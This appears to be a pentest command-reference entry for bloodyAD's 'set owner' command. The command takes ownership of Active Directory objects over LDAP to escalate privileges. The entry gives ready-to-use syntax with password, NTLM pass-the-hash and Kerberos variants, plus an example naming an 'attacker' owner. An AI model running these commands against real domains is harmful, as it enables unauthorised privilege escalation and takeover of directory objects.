BloodyAD Set Object Owner

Set object owner using BloodyAD

Tool
bloodyAD
Category
Privilege Escalation / ACL / DACL Abuse
Platform
linux
Requires
password
Protocols
LDAP

Open in Command Manager

Syntax

Angle-bracket tokens are placeholders — replace them with your target's values, or open this command in the app to fill them in and copy the result.

bloodyAD --host '<ip>' -d '<domain>' -u '<user>' -p '<password>' set owner '<target_object>' '<owner>'

Credential variants

The same attack using a different authentication material.

NTLM Hash requires NTLM hash

bloodyAD --host '<ip>' -d '<domain>' -u '<user>' --hashes ':<hash>' set owner '<target_object>' '<owner>'

Kerberos Ticket requires Kerberos ticket

bloodyAD --host '<ip>' -d '<domain>' -k set owner '<target_object>' '<owner>'

Examples

bloodyAD --host '192.168.1.100' -d 'CORP.LOCAL' -u 'user' -p 'password' set owner 'CN=Target,DC=CORP,DC=LOCAL' 'attacker'

Tags

bloodyad acl owner dacl privilege-escalation